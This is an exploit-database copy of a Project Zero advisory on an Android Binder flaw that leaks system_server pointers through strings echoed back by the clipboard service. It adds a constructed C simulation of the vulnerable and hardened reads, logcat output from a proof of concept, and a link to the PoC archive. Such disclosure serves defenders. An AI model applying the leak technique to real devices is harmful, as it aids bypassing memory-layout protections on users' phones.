Google Android – Insufficient Binder Message Verification Pointer Leak

  • Author: Google Security Research
    Date: 2016-10-03
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/40449/
  • Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=860
    
    When frameworks/native/libs/binder/Parcel.cpp reads e.g. a string from a parcel, it does not verify that the string's byte range doesn't overlap with any byte range the sender tagged as a binder object (through the parcel's object offsets). If an attacker sends a victim process a parcel in which a binder handle referring to an object owned by the victim process sits where the victim expects string data, the kernel rewrites that handle while delivering the transaction into a BINDER_TYPE_BINDER object carrying the victim's own user-space pointer (and cookie) for that object. The victim then treats that pointer as part of the attacker-supplied input data, possibly making it available to the attacker at a later point in time, e.g. through any service that hands caller-supplied strings back to the caller.
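    The three moving parts of that description (the sender tagging a byte range as an object, the kernel translating a handle into the receiver's pointer, and the unchecked Parcel read) can be modelled in a few dozen lines. The following is an added example written for this page; it is neither Parcel.cpp nor the attached PoC, and the node table, the receiver pid 1000 and the pointer/cookie values (borrowed from the logcat output for flavour) are all constructed. The hardened read is one possible check, not the one AOSP ships:

```c
/* Model of the Binder pointer leak: an attacker-built parcel carries a
 * flat_binder_object (tagged via the parcel's object offsets) where the
 * receiver expects string bytes. The "kernel" rewrites a HANDLE that
 * refers to a node owned by the receiver into a BINDER object holding the
 * receiver's user-space pointer, and an unchecked read returns it as data. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Same constants and layout as the kernel's struct flat_binder_object. */
#define BINDER_TYPE_BINDER 0x73622a85u
#define BINDER_TYPE_HANDLE 0x73682a85u

struct flat_binder_object {
    uint32_t type;
    uint32_t flags;
    union { uint64_t binder; uint32_t handle; };
    uint64_t cookie;
};

#define PARCEL_MAX 256
#define MAX_OBJS 8

/* Simplified Parcel: data bytes plus the offsets of embedded binder objects. */
struct parcel {
    uint8_t data[PARCEL_MAX];
    size_t  data_size;
    size_t  data_pos;
    size_t  objects[MAX_OBJS];
    size_t  object_count;
};

/* Constructed stand-in for the kernel's node table: the sender's handle 1
 * refers to a node owned by the receiver (pid 1000). Values are made up. */
struct node { uint32_t handle; int owner_pid; uint64_t ptr; uint64_t cookie; };
static const struct node NODES[] = {
    { 1, 1000, 0x00000071367bfd80ull, 0x00000071296404c0ull },
};

/* Attacker side: put a handle at offset 0, where a string is expected,
 * and tag that offset as an object so the kernel will translate it. */
static void build_attacker_parcel(struct parcel *p) {
    struct flat_binder_object fbo = { .type = BINDER_TYPE_HANDLE, .flags = 0x17f, .handle = 1 };
    memset(p, 0, sizeof *p);
    memcpy(p->data, &fbo, sizeof fbo);
    p->data_size = sizeof fbo;
    p->objects[p->object_count++] = 0;
}

/* Kernel side (what binder_transaction does for the tagged offsets). */
static void kernel_translate(struct parcel *p, int target_pid) {
    for (size_t i = 0; i < p->object_count; i++) {
        struct flat_binder_object fbo;
        memcpy(&fbo, p->data + p->objects[i], sizeof fbo);
        if (fbo.type != BINDER_TYPE_HANDLE) continue;
        for (size_t n = 0; n < sizeof NODES / sizeof NODES[0]; n++) {
            if (NODES[n].handle == fbo.handle && NODES[n].owner_pid == target_pid) {
                fbo.type   = BINDER_TYPE_BINDER;  /* handle -> object local to the target */
                fbo.binder = NODES[n].ptr;       /* the target's own user-space pointer */
                fbo.cookie = NODES[n].cookie;
                memcpy(p->data + p->objects[i], &fbo, sizeof fbo);
            }
        }
    }
}

/* Vulnerable read: bounds-checked, but blind to the object offsets. */
static int read_unchecked(struct parcel *p, void *out, size_t len) {
    if (len > p->data_size - p->data_pos) return -1;
    memcpy(out, p->data + p->data_pos, len);
    p->data_pos += len;
    return 0;
}

/* Hardened read: additionally refuse any overlap with a tagged object. */
static int read_checked(struct parcel *p, void *out, size_t len) {
    if (len > p->data_size - p->data_pos) return -1;
    size_t start = p->data_pos, end = start + len;
    for (size_t i = 0; i < p->object_count; i++) {
        size_t o = p->objects[i], oe = o + sizeof(struct flat_binder_object);
        if (start < oe && o < end) return -2;   /* would hand out binder object bytes */
    }
    return read_unchecked(p, out, len);
}

/* Victim side: read 24 "string" bytes and return the 64-bit value at
 * bytes 8..15 (the binder field), or 0 if the read was refused. */
uint64_t leaked_pointer(int hardened) {
    struct parcel p;
    uint8_t str[sizeof(struct flat_binder_object)];
    uint64_t ptr;
    build_attacker_parcel(&p);
    kernel_translate(&p, 1000);
    int rc = hardened ? read_checked(&p, str, sizeof str) : read_unchecked(&p, str, sizeof str);
    if (rc != 0) return 0;
    memcpy(&ptr, str + 8, sizeof ptr);
    return ptr;
}
```

    With hardened == 0 the "string" the victim copied out contains 0x71367bfd80, the receiver-side pointer the attacker never had; with hardened == 1 the read is rejected because the requested range [0, 24) overlaps the object at offset 0.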
    
    One service that echoes caller-supplied strings back is the "clipboard" service: strings written using setPrimaryClip() can be read back using getPrimaryClip().
    
    A PoC that leaks the addresses of the "permission", "package" and "clipboard" services from system_server is attached (source code and apk).
    
    Its logcat output looks like this. The single hex values are the 16-bit code units of the string that came back; read in order they spell out the translated flat_binder_object: type 0x73622a85 (BINDER_TYPE_BINDER), flags 0x17f, the 64-bit binder pointer 0x71367bfd80 and then the cookie.
    
    ===============
    [...]
    01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 2a85
    01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 7362
    01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 17f
    01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 0
    01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: fd80
    01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 367b
    01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 71
    01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 0
    01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 4c0
    01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 2964
    01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 71
    01-15 05:20:54.530 19158-19158/com.google.jannh.pointerleak E/leaker: == service "permission" ==
    type: BINDER_TYPE_BINDER
    object: 0x000000712967e260
    
    == service "package" ==
    type: BINDER_TYPE_BINDER
    object: 0x000000712963cfc0
    
    == service "clipboard" ==
    type: BINDER_TYPE_BINDER
    object: 0x00000071367bfd80
    ===============
    
    
    Proof of Concept:
    https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40449.zip